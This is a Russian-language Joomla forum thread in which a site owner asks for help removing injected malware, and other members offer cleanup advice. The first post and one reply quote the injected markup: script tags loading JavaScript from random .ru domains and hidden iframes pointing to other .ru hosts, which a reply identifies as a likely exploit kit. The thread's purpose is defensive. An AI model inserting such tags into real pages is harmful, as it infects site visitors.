0 Пользователей и 1 Гость просматривают эту тему.
  • 11 Ответов
  • 507 Просмотров
*

Dusk09

  • Осваиваюсь на форуме
  • 87
  • 0
Здравсвуйте! Перечитал весь форум, перепробовал все сканеры, но они только обнаруживают проблему, перепробовал все методы поиска по куску кода (base64, eval ) погоите. пожалуйста..определить где он живет. как вылечить...скрины

Вот что в  Head
<script src="http://13t0h6f0f7s.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>
<script src="http://cbbze5u2m65vg8.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>

и
BODY
<iframe id="a1996667054" src="https://su2lgyoeucscn.ru/f2.html?a=14945" style="display: none;"></iframe>
<iframe id="a754394637" src="https://doiuhrht.ru/u.html?a=14945" style="display: none;"></iframe>
*

ProtectYourSite

  • Живу я здесь
  • 948
  • 49
  • Безопасность вебсайтов
Проверять надо всё: может быть и в базе данных ( в модуле или статье какой), может подключаться плагином, шаблоном или каким-то компонентом. Надо проверять все файлы.
Конкретно в вашем случае, эти скрипты уже скорее всего подключаются или генерируются функцией, необходимо её сначала определить, иначе поиск никуда не приведет
*

Gosha5767

  • Завсегдатай
  • 427
  • 21
Попробуйте методом исключения, т.е. по очереди отключайте компоненты, плагины, модули и проверяйте сканером.
программа Xenu`s Link Sleuth - в помощь
Чистка сайта от дублей в Яндекс и Google.
Удаление ссылок (битых и внешних) на сайте.
Миграция Joomla 1.5 до Joomla 3.хх
*

Dusk09

  • Осваиваюсь на форуме
  • 87
  • 0
Проверять надо всё: может быть и в базе данных ( в модуле или статье какой), может подключаться плагином, шаблоном или каким-то компонентом. Надо проверять все файлы.
Конкретно в вашем случае, эти скрипты уже скорее всего подключаются или генерируются функцией, необходимо её сначала определить, иначе поиск никуда не приведет
искал на локальной копии сайта...
*

winstrool

  • Завсегдатай
  • 770
  • 41
  • Свободен для работы
Здравсвуйте! Перечитал весь форум, перепробовал все сканеры, но они только обнаруживают проблему, перепробовал все методы поиска по куску кода (base64, eval ) погоите. пожалуйста..определить где он живет. как вылечить...скрины

Вот что в  Head
<script src="http://13t0h6f0f7s.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>
<script src="http://cbbze5u2m65vg8.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>

и
BODY
<iframe id="a1996667054" src="https://su2lgyoeucscn.ru/f2.html?a=14945" style="display: none;"></iframe>
<iframe id="a754394637" src="https://doiuhrht.ru/u.html?a=14945" style="display: none;"></iframe>
Поздравляю вас! на вашем сайте похоже установили связку сплоитов, по моему мнению, это наверное самое ЗЛО, что может быть в заражение сайтов! а такие люди которые это делают, стараются более качественней подходят к своему ремеслу, там крутятся очень большие бабки, и соответствующие финансы входят в поддержку работоспособности подобного бизнеса, как минимум начните со своего компьютера, а потом переходите на лечение сайта.
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

draff

  • Практически профи
  • 2771
  • 171
  • step by step
Советую создать новый сайт в папке сайта, и проверить на iframe.
А проще не искать вирус/шелл в тяжелых случаях, а пересобрать заново сайт на новой версии Joomla и установленных расширений и подключить потом старую базу данных.
*

winstrool

  • Завсегдатай
  • 770
  • 41
  • Свободен для работы
Советую создать новый сайт в папке сайта, и проверить на iframe.
А проще не искать вирус/шелл в тяжелых случаях, а пересобрать заново сайт на новой версии Joomla и установленных расширений и подключить потом старую базу данных.
Суть в том что пересоздание сайта не поможет, тут комп протроянен и сколько бы сайтов ТС не сделал, взломщику будут доступны все его доступы, включая почты, соц. сетей месенеджеров и прочей лабудени...

Пройдитесь по сценарию скрипта увидите что подобная неприятность и вам загрузится если у вас уязвимый браузер... только рекомендую через TOR чтоб на самом деле не подцепить эту херь!
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

Dusk09

  • Осваиваюсь на форуме
  • 87
  • 0
Суть в том что пересоздание сайта не поможет, тут комп протроянен и сколько бы сайтов ТС не сделал, взломщику будут доступны все его доступы, включая почты, соц. сетей месенеджеров и прочей лабудени...

Пройдитесь по сценарию скрипта увидите что подобная неприятность и вам загрузится если у вас уязвимый браузер... только рекомендую через TOR чтоб на самом деле не подцепить эту херь!
Не замечал что кто либо использует мои аккуанты... да и эти вирусы только на одном из трех сайтов ..подозреваю все таки плагины .... Мои действия ?? 1.Проверка компа антивирусом.
« Последнее редактирование: 26.12.2016, 16:04:15 от Dusk09 »
*

winstrool

  • Завсегдатай
  • 770
  • 41
  • Свободен для работы
Не замечал что кто либо использует мои аккуанты...подозреваю все таки плагины .... Мои действия ?? 1.Проверка компа антивирусом.
Ну это может пока не использовали.

Действия:
1. Чистите тщательно свой комп.
        проверти браузеры на сторонние расширения, они могут не детектиться АВ.
        обновляйте плагины, Adobe продукцию какая стоит и используется браузерами, сами браузеры, java
2. Меняете все пассы от чего у вас только может быть
3. Переходите к чистке сайта

Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

draff

  • Практически профи
  • 2771
  • 171
  • step by step
Да не факт что комп ТС. Скрипт я проверил у drweb, есть в базе . (Зачем мне еще на комп грузить, если есть онлайн проверка)
Старый проверенный способ - проверка методом исключения. СОздал Joomla в папке рабочего сайта, нет вируса- значит проблема только в рабочем сайте.
Если есть желание то можно проверить сайты, расположенные на том же хостинге, на наличие вируса. Может сервак хостера взломан, и во все сайты прописывается вирус. У людей на взломанном серваке и в файлы HTML прописывался.
*

winstrool

  • Завсегдатай
  • 770
  • 41
  • Свободен для работы
Да не факт что комп ТС. Скрипт я проверил у drweb, есть в базе . (Зачем мне еще на комп грузить, если есть онлайн проверка)
Старый проверенный способ - проверка методом исключения. СОздал Joomla в папке рабочего сайта, нет вируса- значит проблема только в рабочем сайте.
Если есть желание то можно проверить сайты, расположенные на том же хостинге, на наличие вируса. Может сервак хостера взломан, и во все сайты прописывается вирус. У людей на взломанном серваке и в файлы HTML прописывался.
Это ка вариант, но не факт! поэтому в таком случае, все методы хороши.... тем более с таким типом заражения.
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

capricorn

  • Практически профи
  • 1687
  • 105
ТС, вы пробовали проверить домены, с которых вам подключены скрипты? Играми в интернете не увлекаетесь?
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

опять вирус \?

Автор mami_

Ответов: 15
Просмотров: 170
Последний ответ 07.09.2017, 06:20:29
от voland
Вирус, который виден только в кэше поисковых систем

Автор silavoli

Ответов: 12
Просмотров: 1164
Последний ответ 19.07.2017, 09:57:20
от flyingspook
Поймали вирус trojan.inject.21 как лечить

Автор nick2202

Ответов: 3
Просмотров: 392
Последний ответ 14.07.2017, 17:31:00
от voland
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 99
Просмотров: 46702
Последний ответ 05.07.2017, 15:18:57
от revisium
Вирус в виде рекламы на сайте

Автор yasna

Ответов: 10
Просмотров: 298
Последний ответ 08.06.2017, 18:38:43
от winstrool